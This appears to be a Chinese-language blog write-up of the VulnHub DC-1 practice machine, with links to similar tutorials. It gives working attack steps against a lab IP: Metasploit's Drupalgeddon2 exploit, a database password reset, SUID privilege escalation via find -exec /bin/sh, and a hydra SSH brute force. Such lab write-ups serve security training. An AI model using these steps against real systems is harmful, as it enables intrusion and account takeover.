DC1渗透

最新推荐文章于 2024-03-13 20:27:13 发布
最新推荐文章于 2024-03-13 20:27:13 发布
阅读量719 收藏 6
点赞数 3
分类专栏: kali 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43430261/article/details/104698147
版权
  • kail虚拟机ip为
    在这里插入图片描述
  • nmap -sP 192.168.72.197/24 扫描本网段存活主机

在这里插入图片描述

  • nmap -sV 192.168.72.198 查看靶机开放了哪些服务及服务版本
    在这里插入图片描述
    发现靶机开放ssh服务和http服务
  • 尝试访问http服务
    在这里插入图片描述
  • 使用插件Wappalyzer进行网站指纹识别发现网站使用Drupal 7.x管理系统
  • 用MSF search一下该CMS已知的漏洞
    在这里插入图片描述
  • 启动msf(mfsconsole)
    在这里插入图片描述
  • 漏洞利用
    • 有很多可以使用的模块,选择一个最新的模块进行利用
    • use exploit/unix/webapp/drupal_drupalgeddon2
    • 设置目标IP地址 set RHOST 192.168.72.198
    • 利用该模块进行攻击 exploit,可以成功获取目标靶机的 shell
    • 成功拿到shell
      在这里插入图片描述
  • 拿到shell,用户权限为 www-data
    在这里插入图片描述
  • 利用python反弹shell
    在这里插入图片描述
    理解这段英语,提示需要提升权限为root权限
  • 继续在站点路径下寻找敏感文件
    在这里插入图片描述
    这段英语提示寻找站点的配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php
  • 在这里发现flag2和数据库账号和密码,flag2提示,提升权限为root来查看敏感文件,或者直接爆破
    在这里插入图片描述
  • 进入数据库,查看
    在这里插入图片描述
  • 找Drupal user 表,发现admin用户,并退出mysql
    在这里插入图片描述
  • 置换drupal密码,阅读此文章http://drupalchina.cn/node/2128
php scripts/password-hash.sh 123456

在这里插入图片描述

  • 重新进入mysql,进入到drupaldb表中,置换密码
    在这里插入图片描述
  • 此时数据库中账号为admin,密码为123456,用次账号登录网址,进入网站,在网站中查找有用信息
    在这里插入图片描述
  • 在网站目录content里面找到flag3的提示
    在这里插入图片描述
  • flag3中有提示,使用find命令,并提示 -exec,是suid提权在这里插入图片描述
find / -perm -4000 2>/dev/null

这行命令不懂可以先跳过,后面给出三篇文章,阅读之后可以看懂这行命令,初学看懂就行,不需要深究,太耗费精力。
find /
-perm -4000
2>/dev/null

  • 在网站站点路径下,使用命令测试,发现为root权限
touch 666
find / -name 666 -exec "whoami" \;
find / -name 666 -exec "whoami" \;find / -name 666 -exec "/bin/sh" \;

在这里插入图片描述

  • 到这个地方渗透是成功了,但是还有登陆终端的账号和密码,使用爆破的方法
    查看 /etc/passwd 文件,发现存在 flag4 用户,可以使用hydra + John the Ripper的密码本,进行爆破进行。
    在这里插入图片描述
  • John the Ripper需要自己安装,参考这个文章安装john
hydra -l flag4 -P /root/桌面/john-1.8.0/run/password.lst  ssh://192.168.72.198

在这里插入图片描述
密码为:orange

  • 登陆终端
    在这里插入图片描述
    在这里插入图片描述
GitCloud
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机DC-1
cyzCc的博客
02-15 911
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
DC系列:1 (DC-1靶机,初级渗透详细教程)
jrdh的博客
11-29 7494
DC-1靶机渗透环境搭建详情描述使用工具一:信息收集基础信息查询0x01 查看存活主机0x02 查看开放端口0x03 查看端口服务0x04 扫描网站根目录及指纹信息0x05 访问开放网页二:漏洞发现msf漏洞查询0x01 启动msf0x02 flag10x03 flag20x04 查询数据库信息三:漏洞利用ssh远程连接漏洞0x01 破解密码加密0x02 flag30x03 爆破flag4用户密码0x04 ssh远程连接0x05 flag4四:提权总结 find提权详解 find详解. 环境搭建 详情
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2904
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC系列:dc-1(渗透过程)
最新发布
2401_82463993的博客
03-13 1264
(meterpreter它是一种轻量级的后门程序,可用于远程访问受攻击系统,执行各种操作和操纵受感染的主机。还有一个名为drupaldb的数据库,然后我们登录一下这个数据库,查看其中的内容。通过该模块,攻击者可以利用漏洞执行远程命令,进而控制受影响的Drupal网站。表中用户名的密码是加密的,数据库大部分加密方式是cmd5加密方式。这边可以看到靶机的22 80 111和51771端口是开放的。username(用户名)=dbuser(数据库用户名)想让我们找到一个find的文件,可能是最后一个flag。
Vulnhub靶场渗透测试系列DC-1(Drupal漏洞)
qq_45722813的博客
11-14 4902
Vulnhub渗透测试系列-DC-1 靶机下载 地址:https://www.vulnhub.com/entry/dc-1,292/ 攻击机使用kali2021的VMware虚拟机,IP地址:192.168.172.131 在VMware中导入靶机,中间可能出现这个问题,直接点击【重试】 导入之后将网络模式设置为NAT模式 开启靶机虚拟机过程出现下面这个,点击【是】或【否】都可 虚拟机已开启 在kali攻击机中使用命令nmap -Pn 192.168.172.1/24扫描,进行主机发现,获取靶机的IP地址,
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
esp_dc1:DC1插线板固件
04-14
ESP DC1斐讯DC1智能排插个人固件.WHY众所周知的原因,斐讯服务器已经不能正常访问,插座的APP控制已经无法正常实现,需要有另外的方式实现插座的控制。已有的方法为内网劫持实现,具体可参考。这次要实现的是通过一...
斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT
02-18
DC1固件斐讯DC1插座固件无需更改模块直接烧录支持电量识别MQTT 斐讯DC1插座固件斐讯DC1插座固件斐讯DC1插座固件
flows.homekit.v1.json.zip
02-15
斐讯 DC1 WIFI 排插,官方 APP 已经无法使用,通过 DNS 劫持到自己的服务器,实现手机控制。使用dnsmasq劫持smartplugconnect.phicomm.com到你NodeRed所在IP,下载脚本,全局搜索替换 "您的DC1的MAC地址" 为您的 DC1...
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2704
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
看完这篇 教你玩转渗透测试靶机vulnhub——DC1
Aluxian_的博客
03-22 7496
Vulnhub靶机DC1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:漏洞发现: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 Vulnhub靶机下载: 官网地址:https://www.vulnhub.com/entry/dc-1,292/ Vulnhub靶机安装: 下载好了把安装包
DC1-靶机
Au
07-31 9481
环境搭建 DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。 将下载的ova文件导入VMware Workstation15(低版本不支持导入ova文件) 配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段) 靶机开机后是一个登陆页面,无法得知ip 环境 kali:192.1...
渗透:vulnhub DC系列之DC1
m0_46412682的博客
09-15 879
DC系列之DC1 一、靶机配置及说明 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 靶机:DC1(VMware) IP:192.168.49.152 攻击机:kali2018 IP:192.168.49.153 有四个flag 参考: https://bbs.ichunqiu.com/thread-56746-1-1.html https://www.jianshu.com/p/185b45a32681 二、配置靶机 ①解压后,右键点击.
DC1靶机
孤的博客
09-30 1096
目标探测 因为是在局域网内,所以使用内网扫描 目标已经确定,进行端口扫描 namp -sT -sC -p- -sV -T 3 -sT 全连接 -sC 使用默认的安全脚本 -p- 全端口 -sV 版本探测 -T 时间频率(太快的话,可能什么也扫不到) 根据扫描结果,我们以80端口位突破口 很明显,我们看到网站的cms,所以我们可以直接在网上搜索这个cms的漏洞利用方式 使用metaspl...
渗透靶机测试之DC:1
hclimg的博客
08-23 668
一、查看靶机要求: 需要通过这个靶机来获得五个标志,在root的主目标中查找和读取,那就是直接拿到这个靶机的权限就行了 二、进行主机发现 三、对主机进行详细扫描及浏览主页 在网上查找Drupal,发现这个cms存在漏洞,打开msf进行漏洞查找 三、利用该漏洞,拿到shell 拿到shell,但是此时的shell,并不是完全交互的tty,使用python转换获取完全交互的tty 四、...
DC靶场系列--DC1
BGiscool的博客
06-28 4856
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
渗透之CMS
追风筝的孩子
09-07 3022
       CMS,即 Content Management System ,中文全称是“网站内容管理系统”。网站内容管理系统具有许多基于模板的优秀设计,可以加快网站开发的速度和减少开发的成本。网站内容管理系统的功能并不只限于文本处理,它也可以处理图片、Flash动画、声像流、图像甚至电子邮件档案。网站内容管理系统其实是一个很广泛的称呼,从一般的博客程序,新闻发布程序,到综合性的网站管理程序都可...
DC-1渗透测试流程。
qq_60463414的博客
07-18 531
DC靶机系列DC-1渗透测试流程。
dc1无法反弹shell
08-05
回答: 反弹shell的问题可能是由于配置或命令错误导致的。请确保您按照正确的步骤执行了反弹shell的过程。首先,您需要确保攻击机上的监听程序已经正确启动,可以使用nc命令监听指定的端口。接下来,您需要确保在目标机器上正确添加了反弹shell的代码,并将其放置在适当的位置,比如backups.sh文件中。最后,您需要等待计划任务执行反弹shell的代码。如果仍然无法成功反弹shell,请检查您的代码和配置是否正确,并确保您有足够的权限执行这些操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值